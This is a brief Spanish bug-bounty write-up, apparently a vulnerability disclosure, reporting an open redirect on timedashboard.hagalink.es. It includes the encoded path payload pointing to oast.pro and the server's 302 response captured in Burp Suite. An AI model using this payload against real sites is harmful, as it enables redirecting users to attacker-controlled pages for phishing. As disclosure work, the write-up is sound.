---
title: "Writeup VDP Hagalink — VDP Program en Grayback"
machine: "VDP Hagalink"
platform: "VDP Program en Grayback"
difficulty: "Medio"
operating_system: ["Web"]
tags: ["web", "openredirect", "vdp", "bugbounty", "burpsuite"]
author: "WaterRessistan"
author_url: "https://writeups.es/u/WaterRessistan"
source: "https://writeups.es/writeups/vdp-program-en-grayback/vdp-hagalink/WaterRessistan"
license: "CC BY-SA 4.0"
published: "2026-05-28T15:54:17.907853+00:00"
updated: "2026-08-14T18:15:44.659871+00:00"
words: 72
reading_minutes: 1
---# VDP Hagalink — VDP Program en Grayback

### PASOS PARA REPRODUCIR
Navegar a timedashboard.hagalink.es
Manipular URL de la siguiente manera: https://timedashboard.hagalink.es/public/..%2F%5coast.pro%2F%3f%2F..%2F..
Si miramos en la petición nos devuelve 302 Found Location: /\oast.pro/?/../../ y Found. Logramos hacer que el servidor procese nuestro código inyectado en la URL

### PRUEBA DE CONCEPTO
He usado burpsuite. Petición inicial:
GET /public/..%2F%5coast.pro%2F%3f%2F..%2F.. HTTP/2 Host: timedashboard.hagalink.es
Respuesta por parte del servidor:
302 OK Location: /\oast.pro/?/../../ Found
Muy sencillo de realizar y comprobamos la vulnerabilidad de esta manera.

---

> Writeup de **WaterRessistan** publicado en [writeups.es](https://writeups.es/writeups/vdp-program-en-grayback/vdp-hagalink/WaterRessistan).
> Si citas este contenido, enlaza a la fuente original.
